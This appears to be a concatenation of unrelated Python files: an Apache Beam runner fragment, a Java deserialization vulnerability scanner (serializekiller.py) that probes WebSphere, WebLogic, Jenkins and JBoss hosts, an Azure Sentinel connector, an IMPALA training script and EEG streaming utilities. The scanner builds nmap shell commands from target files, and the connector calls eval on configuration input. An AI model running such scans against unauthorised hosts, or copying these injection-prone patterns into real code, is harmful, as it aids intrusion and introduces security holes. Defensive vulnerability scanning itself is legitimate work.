instruction_reference=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
**kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with futures.ThreadPoolExecutor(max_workers=self._num_workers) as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
use_monitoring_infos: If true, return the metrics based on the
step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
self._monitoring_infos = step_monitoring_infos
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
# Right now this assumes that all metrics have a PTRANSFORM
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(ptransform_id, MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
serializekiller.py
|
#!/usr/bin/env python
#-------------------------------------------------------------------------------
# Name: SerializeKiller
# Purpose: Finding vulnerable vulnerable servers
#
# Author: (c) John de Kroon, 2015
# Version: 1.0.2
#-------------------------------------------------------------------------------
import subprocess
import threading
import time
import socket
import sys
import argparse
import urllib2
import ssl
from socket import error as socket_error
from datetime import datetime
import thread, time
mutex = thread.allocate_lock()
parser = argparse.ArgumentParser(prog='serializekiller.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Scan for Java Deserialization vulnerability.")
parser.add_argument('--url', nargs='?', help="Scan a single URL")
parser.add_argument('file', nargs='?', help='File with targets')
args = parser.parse_args()
def nmap(host, *args):
global shellCounter
global threads
global target_list
# are there any ports defined for this host?
if not target_list[host]:
found = False
cmd = 'nmap --host-timeout 5 --open -p 5005,8080,9080,8880,8887,7001,7002,16200 '+host
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
if "5005" in out:
if websphere(host, "5005"):
found = True
if "8880" in out:
if websphere(host, "8880"):
found = True
if "8887" in out:
if websphere(host, "8887"):
found = True
if "7001" in out:
if weblogic(host, 7001):
found = True
if "16200" in out:
if weblogic(host, 16200):
found = True
if "8080" in out:
if jenkins(host, "8080"):
found = True
if jboss(host, 8080):
found = True
if "9080" in out:
if jenkins(host, "9080"):
found = True
if found:
shellCounter += 1
except ValueError:
print " ! Something went wrong on host: "+host
return
else:
for port in target_list[host]:
if websphere(host, port) or weblogic(host, port) or jenkins(host, port) or jboss(host, port):
shellCounter += 1
return
def websphere(url, port, retry=False):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
output = urllib2.urlopen('https://'+url+":"+port, context=ctx, timeout=8).read()
if "rO0AB" in output:
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except urllib2.HTTPError, e:
if e.getcode() == 500:
if "rO0AB" in e.read():
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except:
pass
try:
output = urllib2.urlopen('http://'+url+":"+port, timeout=3).read()
if "rO0AB" in output:
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except urllib2.HTTPError, e:
if e.getcode() == 500:
if "rO0AB" in e.read():
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except:
pass
#Used this part from https://github.com/foxglovesec/JavaUnserializeExploits
def weblogic(url, port):
try:
server_address = (url, int(port))
sock = socket.create_connection(server_address, 4)
sock.settimeout(2)
# Send headers
headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
sock.sendall(headers)
try:
data = sock.recv(1024)
except socket.timeout:
return False
sock.close()
if "HELO" in data:
mutex.acquire()
print " - Vulnerable Weblogic: "+url+" ("+str(port)+")"
mutex.release()
return True
return False
except socket_error:
return False
#Used something from https://github.com/foxglovesec/JavaUnserializeExploits
def jenkins(url, port):
try:
cli_port = False
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
output = urllib2.urlopen('https://'+url+':'+port+"/jenkins/", context=ctx, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except urllib2.HTTPError, e:
if e.getcode() == 404:
try:
output = urllib2.urlopen('https://'+url+':'+port, context=ctx, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except:
pass
except:
pass
except:
mutex.acquire()
print " ! Could not check Jenkins on https. Maybe your SSL lib is broken."
mutex.release()
pass
if cli_port == False:
try:
output = urllib2.urlopen('http://'+url+':'+port+"/jenkins/", timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except urllib2.HTTPError, e:
if e.getcode() == 404:
try:
output = urllib2.urlopen('http://'+url+':'+port, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except:
return False
except:
return False
#Open a socket to the CLI port
try:
server_address = (url, cli_port)
sock = socket.create_connection(server_address, 5)
# Send headers
headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
sock.send(headers)
data1 =sock.recv(1024)
if "rO0AB" in data1:
mutex.acquire()
print " - Vulnerable Jenkins: "+url+" ("+str(port)+")"
mutex.release()
return True
else:
data2 = sock.recv(1024)
if "rO0AB" in data2:
mutex.acquire()
print " - Vulnerable Jenkins: "+url+" ("+str(port)+")"
mutex.release()
return True
except:
pass
return False
def jboss(url, port, retry = False):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
output = urllib2.urlopen('https://'+url+':'+port+"/invoker/JMXInvokerServlet", context=ctx, timeout=8).read()
except:
try:
output = urllib2.urlopen('http://'+url+':'+port+"/invoker/JMXInvokerServlet", timeout=8).read()
except:
#OK. I give up.
return False
if "\xac\xed\x00\x05" in output:
mutex.acquire()
print " - Vulnerable JBOSS: "+url+" ("+port+")"
mutex.release()
return True
return False
def urlStripper(url):
url = str(url.replace("https:", ''))
url = str(url.replace("http:", ''))
url = str(url.replace("\r", ''))
url = str(url.replace("\n", ''))
url = str(url.replace("/", ''))
return url
def read_file(filename):
f = open(filename)
content = f.readlines()
f.close()
return content
def worker():
global threads
content = read_file(args.file)
for line in content:
if ":" in line:
item = line.strip().split(':')
if item[0] not in target_list:
target_list[item[0]] = [item[1]]
else:
target_list[item[0]].append(item[1])
else:
if line.strip() not in target_list:
target_list[line.strip()] = []
print str(len(target_list)) + " targets found."
total_jobs = len(target_list)
current = 0
for host in target_list:
current += 1
while threading.active_count() > threads:
mutex.acquire()
print " ! We have more threads running than allowed. Current: {} Max: {}.".format(threading.active_count(),
threads)
mutex.release()
if threads < 100:
threads+=1
sys.stdout.flush()
time.sleep(2)
mutex.acquire()
print " # Starting test {} of {} on {}.".format(current, total_jobs, host)
sys.stdout.flush()
mutex.release()
threading.Thread(target=nmap, args=(host, False, 1)).start()
#we're done!
while threading.active_count() > 2:
mutex.acquire()
print " # Waiting for everybody to come back. Still {} active.".format(threading.active_count() - 1)
sys.stdout.flush()
mutex.release()
time.sleep(4)
mutex.acquire()
print
print " => scan done. "+str(shellCounter)+" vulnerable hosts found."
print "Execution time: "+str(datetime.now() - startTime)
mutex.release()
exit()
if __name__ == '__main__':
startTime = datetime.now()
mutex.acquire()
print "Start SerializeKiller..."
print "This could take a while. Be patient."
print
mutex.release()
try:
ssl.create_default_context()
except:
print " ! WARNING: Your SSL lib isn't supported. Results might be incomplete."
pass
target_list = {}
shellCounter = 0
if args.url:
target_list[urlStripper(args.url)] = []
nmap(urlStripper(args.url))
elif args.file:
threads = 30
worker()
else:
mutex.acquire()
print "ERROR: Specify a file or a url!"
mutex.release()
|
__init__.py
|
import requests
import datetime
import dateutil
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
aws_region_name = os.environ.get('AWSRegionName')
aws_securityhub_filters = os.environ.get('SecurityHubFilters')
sentinel_log_type = os.environ.get('LogAnalyticsCustomLogName')
fresh_event_timestamp = os.environ.get('FreshEventTimeStamp')
logAnalyticsUri = os.environ.get('LAURI')
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + sentinel_customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$'
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("AWSSecurityHubFindingsDataconnector: Invalid Log Analytics Uri.")
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
sentinel = AzureSentinelConnector(logAnalyticsUri, sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
securityHubSession = SecurityHubClient(aws_access_key_id, aws_secret_acces_key, aws_region_name)
securityhub_filters_dict = {}
logging.info ('SecurityHubFilters : {0}'.format(aws_securityhub_filters))
if aws_securityhub_filters:
securityhub_filters = aws_securityhub_filters.replace("\'", "\"")
securityhub_filters_dict = eval(securityhub_filters)
results = securityHubSession.getFindings(securityhub_filters_dict)
fresh_events_after_this_time = securityHubSession.freshEventTimestampGenerator(int(fresh_event_timestamp))
fresh_events = True
first_call = True
failed_sent_events_number = 0
successfull_sent_events_number = 0
while ((first_call or 'NextToken' in results) and fresh_events):
# Loop through all findings (100 per page) returned by Security Hub API call
# Break out of the loop when we have looked back across the last hour of events (based on the finding's LastObservedAt timestamp)
first_call = False
for finding in results['Findings']:
finding_timestamp = securityHubSession.findingTimestampGenerator(finding['LastObservedAt'])
if (finding_timestamp > fresh_events_after_this_time):
logging.info ('SecurityHub Finding:{0}'.format(json.dumps(finding)))
payload = {}
payload.update({'SchemaVersion':finding['SchemaVersion']})
payload.update({'Id':finding['Id']})
payload.update({'ProductArn':finding['ProductArn']})
payload.update({'GeneratorId':finding['GeneratorId']})
payload.update({'AwsAccountId':finding['AwsAccountId']})
payload.update({'Types':finding['Types']})
payload.update({'FirstObservedAt':finding['FirstObservedAt']})
payload.update({'LastObservedAt':finding['LastObservedAt']})
payload.update({'UpdatedAt':finding['UpdatedAt']})
payload.update({'Severity':json.dumps(finding['Severity'], sort_keys=True)})
payload.update({'Title':finding['Title']})
payload.update({'ProductFields':json.dumps(finding['ProductFields'], sort_keys=True)})
payload.update({'ProductArn':finding['ProductArn']})
payload.update({'CreatedAt':finding['CreatedAt']})
payload.update({'Resources':finding['Resources']})
payload.update({'WorkflowState':finding['WorkflowState']})
payload.update({'RecordState':finding['RecordState']})
with sentinel:
sentinel.send(payload)
failed_sent_events_number = sentinel.failed_sent_events_number
successfull_sent_events_number = sentinel.successfull_sent_events_number
else:
fresh_events = False
break
if (fresh_events and 'NextToken' in results):
results = securityHubSession.getFindingsWithToken(results['NextToken'], securityhub_filters_dict)
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
if successfull_sent_events_number:
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
if successfull_sent_events_number == 0 and failed_sent_events_number == 0:
logging.info('No Fresh SecurityHub Events')
class SecurityHubClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_region_name):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_region_name = aws_region_name
self.securityhub = boto3.client(
'securityhub',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key,
region_name=self.aws_region_name
)
def freshEventTimestampGenerator(self, freshEventsDuration):
tm = datetime.datetime.utcfromtimestamp(time.time())
return time.mktime((tm - datetime.timedelta(minutes=freshEventsDuration)).timetuple())
# Gets the epoch time of a UTC timestamp in a Security Hub finding
def findingTimestampGenerator(self, finding_time):
d = dateutil.parser.parse(finding_time)
d.astimezone(dateutil.tz.tzutc())
return time.mktime(d.timetuple())
# Gets 100 most recent findings from securityhub
def getFindings(self, filters={}):
return self.securityhub.get_findings(
Filters=filters,
MaxResults=100,
SortCriteria=[{"Field": "LastObservedAt", "SortOrder": "desc"}])
# Gets 100 findings from securityhub using the NextToken from a previous request
def getFindingsWithToken(self, token, filters={}):
return self.securityhub.get_findings(
Filters=filters,
NextToken=token,
MaxResults=100,
SortCriteria=[{"Field": "LastObservedAt", "SortOrder": "desc"}]
)
class AzureSentinelConnector:
def __init__(self, log_analytics_uri, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.log_analytics_uri = log_analytics_uri
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
self.failedToSend = False
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body, sort_keys=True)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = self.log_analytics_uri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
self.successfull_sent_events_number += events_number
self.failedToSend = False
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
self.failedToSend = True
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
|
train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gym
import numpy as np
import os
import queue
import time
import threading
import parl
from atari_model import AtariModel
from atari_agent import AtariAgent
from parl.env.atari_wrappers import wrap_deepmind
from parl.utils import logger, tensorboard
from parl.utils.scheduler import PiecewiseScheduler
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
from actor import Actor
class Learner(object):
def __init__(self, config):
self.config = config
self.sample_data_queue = queue.Queue(
maxsize=config['sample_queue_max_size'])
#=========== Create Agent ==========
env = gym.make(config['env_name'])
env = wrap_deepmind(env, dim=config['env_dim'], obs_format='NCHW')
obs_shape = env.observation_space.shape
act_dim = env.action_space.n
model = AtariModel(act_dim)
algorithm = parl.algorithms.IMPALA(
model,
sample_batch_steps=self.config['sample_batch_steps'],
gamma=self.config['gamma'],
vf_loss_coeff=self.config['vf_loss_coeff'],
clip_rho_threshold=self.config['clip_rho_threshold'],
clip_pg_rho_threshold=self.config['clip_pg_rho_threshold'])
self.agent = AtariAgent(algorithm, obs_shape, act_dim,
self.learn_data_provider)
self.cache_params = self.agent.get_weights()
self.params_lock = threading.Lock()
self.params_updated = False
self.cache_params_sent_cnt = 0
self.total_params_sync = 0
#========== Learner ==========
self.lr, self.entropy_coeff = None, None
self.lr_scheduler = PiecewiseScheduler(config['lr_scheduler'])
self.entropy_coeff_scheduler = PiecewiseScheduler(
config['entropy_coeff_scheduler'])
self.total_loss_stat = WindowStat(100)
self.pi_loss_stat = WindowStat(100)
self.vf_loss_stat = WindowStat(100)
self.entropy_stat = WindowStat(100)
self.kl_stat = WindowStat(100)
self.learn_time_stat = TimeStat(100)
self.start_time = None
self.learn_thread = threading.Thread(target=self.run_learn)
self.learn_thread.setDaemon(True)
self.learn_thread.start()
#========== Remote Actor ===========
self.remote_count = 0
self.batch_buffer = []
self.remote_metrics_queue = queue.Queue()
self.sample_total_steps = 0
self.remote_manager_thread = threading.Thread(
target=self.create_actors)
self.remote_manager_thread.setDaemon(True)
self.remote_manager_thread.start()
def learn_data_provider(self):
""" Data generator for fluid.layers.py_reader
"""
while True:
sample_data = self.sample_data_queue.get()
self.sample_total_steps += sample_data['obs'].shape[0]
self.batch_buffer.append(sample_data)
buffer_size = sum(
[data['obs'].shape[0] for data in self.batch_buffer])
if buffer_size >= self.config['train_batch_size']:
batch = {}
for key in self.batch_buffer[0].keys():
batch[key] = np.concatenate(
[data[key] for data in self.batch_buffer])
self.batch_buffer = []
obs_np = batch['obs'].astype('float32')
actions_np = batch['actions'].astype('int64')
behaviour_logits_np = batch['behaviour_logits'].astype(
'float32')
rewards_np = batch['rewards'].astype('float32')
dones_np = batch['dones'].astype('float32')
self.lr = self.lr_scheduler.step()
self.entropy_coeff = self.entropy_coeff_scheduler.step()
yield [
obs_np, actions_np, behaviour_logits_np, rewards_np,
dones_np, self.lr, self.entropy_coeff
]
def run_learn(self):
""" Learn loop
"""
while True:
with self.learn_time_stat:
total_loss, pi_loss, vf_loss, entropy, kl = self.agent.learn()
self.params_updated = True
self.total_loss_stat.add(total_loss)
self.pi_loss_stat.add(pi_loss)
self.vf_loss_stat.add(vf_loss)
self.entropy_stat.add(entropy)
self.kl_stat.add(kl)
def create_actors(self):
""" Connect to the cluster and start sampling of the remote actor.
"""
parl.connect(self.config['master_address'])
logger.info('Waiting for {} remote actors to connect.'.format(
self.config['actor_num']))
for i in range(self.config['actor_num']):
self.remote_count += 1
logger.info('Remote actor count: {}'.format(self.remote_count))
if self.start_time is None:
self.start_time = time.time()
remote_thread = threading.Thread(target=self.run_remote_sample)
remote_thread.setDaemon(True)
remote_thread.start()
def run_remote_sample(self):
""" Sample data from remote actor and update parameters of remote actor.
"""
remote_actor = Actor(self.config)
cnt = 0
remote_actor.set_weights(self.cache_params)
while True:
batch = remote_actor.sample()
self.sample_data_queue.put(batch)
cnt += 1
if cnt % self.config['get_remote_metrics_interval'] == 0:
metrics = remote_actor.get_metrics()
if metrics:
self.remote_metrics_queue.put(metrics)
self.params_lock.acquire()
if self.params_updated and self.cache_params_sent_cnt >= self.config[
'params_broadcast_interval']:
self.params_updated = False
self.cache_params = self.agent.get_weights()
self.cache_params_sent_cnt = 0
self.cache_params_sent_cnt += 1
self.total_params_sync += 1
self.params_lock.release()
remote_actor.set_weights(self.cache_params)
def log_metrics(self):
""" Log metrics of learner and actors
"""
if self.start_time is None:
return
metrics = []
while True:
try:
metric = self.remote_metrics_queue.get_nowait()
metrics.append(metric)
except queue.Empty:
break
episode_rewards, episode_steps = [], []
for x in metrics:
episode_rewards.extend(x['episode_rewards'])
episode_steps.extend(x['episode_steps'])
max_episode_rewards, mean_episode_rewards, min_episode_rewards, \
max_episode_steps, mean_episode_steps, min_episode_steps =\
None, None, None, None, None, None
if episode_rewards:
mean_episode_rewards = np.mean(np.array(episode_rewards).flatten())
max_episode_rewards = np.max(np.array(episode_rewards).flatten())
min_episode_rewards = np.min(np.array(episode_rewards).flatten())
mean_episode_steps = np.mean(np.array(episode_steps).flatten())
max_episode_steps = np.max(np.array(episode_steps).flatten())
min_episode_steps = np.min(np.array(episode_steps).flatten())
metric = {
'Sample steps': self.sample_total_steps,
'max_episode_rewards': max_episode_rewards,
'mean_episode_rewards': mean_episode_rewards,
'min_episode_rewards': min_episode_rewards,
'max_episode_steps': max_episode_steps,
'mean_episode_steps': mean_episode_steps,
'min_episode_steps': min_episode_steps,
'sample_queue_size': self.sample_data_queue.qsize(),
'total_params_sync': self.total_params_sync,
'cache_params_sent_cnt': self.cache_params_sent_cnt,
'total_loss': self.total_loss_stat.mean,
'pi_loss': self.pi_loss_stat.mean,
'vf_loss': self.vf_loss_stat.mean,
'entropy': self.entropy_stat.mean,
'kl': self.kl_stat.mean,
'learn_time_s': self.learn_time_stat.mean,
'elapsed_time_s': int(time.time() - self.start_time),
'lr': self.lr,
'entropy_coeff': self.entropy_coeff,
}
for key, value in metric.items():
if value is not None:
tensorboard.add_scalar(key, value, self.sample_total_steps)
logger.info(metric)
if __name__ == '__main__':
from impala_config import config
learner = Learner(config)
assert config['log_metrics_interval_s'] > 0
while True:
time.sleep(config['log_metrics_interval_s'])
learner.log_metrics()
|
utils.py
|
"""
=====
Utils
=====
This module define usefull decorators to use with data analysis.
"""
import os
import json
import time
import logging
import random
from datetime import datetime, timedelta
from multiprocessing import Process
from threading import Thread
from typing import Callable
import re
import numpy as np
from openbci_stream.acquisition import OpenBCIConsumer
from ...extensions import properties as prop
class data:
value = {
'context': {},
}
data_tmp_aux_ = None
data_tmp_eeg_ = None
# ----------------------------------------------------------------------
def subprocess_this(fn: Callable) -> Callable:
"""Decorator to move methods to subprocessing."""
def wraper(*args, **kwargs):
c = Process(target=fn, args=args)
c.start()
return wraper
# ----------------------------------------------------------------------
def thread_this(fn: Callable) -> Callable:
"""Decorator to move methods to threading."""
def wraper(*args, **kwargs):
c = Thread(target=fn, args=args)
c.start()
return wraper
# ----------------------------------------------------------------------
def timeit(fn: Callable) -> Callable:
"""Decorator to calculate the execution time of a method."""
def wraper(self, *args, **kwargs):
t0 = time.time()
r = fn(self, *args, **kwargs)
t1 = time.time()
print(f"[timeit] {fn.__name__}: {(t1-t0)*1000:.2f} ms")
return r
return wraper
# ----------------------------------------------------------------------
def loop_consumer(*topics, package_size=None) -> Callable:
"""Decorator to iterate methods with new streamming data.
This decorator will call a method on every new data streamming input.
"""
global data_tmp_eeg_, data_tmp_aux_, package_size_
topics = list(topics)
if json.loads(os.getenv('BCISTREAM_RASPAD')):
package_size_ = 1000
else:
package_size_ = package_size
def wrap_wrap(fn: Callable) -> Callable:
global data_tmp_eeg_, data_tmp_aux_, package_size_
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
global data_tmp_eeg_, data_tmp_aux_, package_size_
if cls._feedback:
topics.append('feedback')
# if cls._package_size:
# package_size_ = cls._package_size
with OpenBCIConsumer(host=prop.HOST, topics=topics) as stream:
frame = 0
for data in stream:
if cls._package_size:
package_size_ = cls._package_size
if data.topic == 'feedback':
feedback = data.value
if (
feedback['name'] == cls._feedback.name
and feedback['mode'] == 'stimuli2analysis'
):
cls._feedback._on_feedback(**feedback)
continue
if data.topic == 'eeg':
frame += 1
if hasattr(cls, 'buffer_eeg_'):
cls.update_buffer(
eeg=data.value['data'],
timestamp=min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET,
)
data_ = data.value['data']
elif data.topic == 'aux':
frame += 1
if hasattr(cls, 'buffer_aux_'):
cls.update_buffer(
aux=data.value['data'],
timestamp=min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET,
)
data_ = data.value['data']
else:
data_ = data.value
# latency calculated with `timestamp.binary`
if data.topic in ['eeg', 'aux']:
latency = (
datetime.now()
- datetime.fromtimestamp(
min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET
)
).total_seconds() * 1000
samples = data.value['context']['sample_ids']
else:
# latency calculated with kafka timestamp
latency = (
datetime.now()
- datetime.fromtimestamp(data.timestamp / 1000)
).total_seconds() * 1000
samples = None
if package_size_ and (data.topic in ['eeg', 'aux']):
if data.topic == 'eeg':
if data_tmp_eeg_ is None:
data_tmp_eeg_ = np.zeros((data_.shape[0], 0))
data_tmp_eeg_ = np.concatenate(
[data_tmp_eeg_, data_], axis=1
)
d = data_tmp_eeg_
elif data.topic == 'aux':
if data_tmp_aux_ is None:
data_tmp_aux_ = np.zeros((data_.shape[0], 0))
data_tmp_aux_ = np.concatenate(
[data_tmp_aux_, data_], axis=1
)
d = data_tmp_aux_
kwargs = {
'data': d,
'kafka_stream': data,
'topic': data.topic,
'frame': frame,
'latency': latency,
'samples': samples,
}
n = package_size_ // prop.STREAMING_PACKAGE_SIZE
if frame % n == 0:
fn(*[cls] + [kwargs[v] for v in arguments])
# else:
